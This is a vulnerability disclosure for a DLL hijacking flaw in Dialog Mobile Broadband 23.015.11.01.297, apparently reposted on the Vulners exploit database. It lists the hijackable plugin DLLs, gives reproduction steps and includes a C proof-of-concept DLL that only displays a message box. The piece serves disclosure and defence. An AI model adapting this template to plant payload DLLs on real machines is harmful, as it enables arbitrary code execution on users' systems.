`Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297
Vulnerability type .............................. DLL hijacking vulnerability
Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll
Vendor url .https://www.dialog.lk
Author..Himash
Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet.
It comes with dialog dongle pre installed.
1. Compile dynamic link library (DLL)
2. Rename to CallSrvPlugin.dll
2. Copy CallSrvPlugin to "C:\Program Files (x86)\Dialog Mobile Broadband"
3. Launch Dialog Mobile Broadband
4. MessageBox executes that verifies the dll hijacking is successful.
Proof of concept Exploit
#include <windows.h>
int dll_hijack()
{
MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation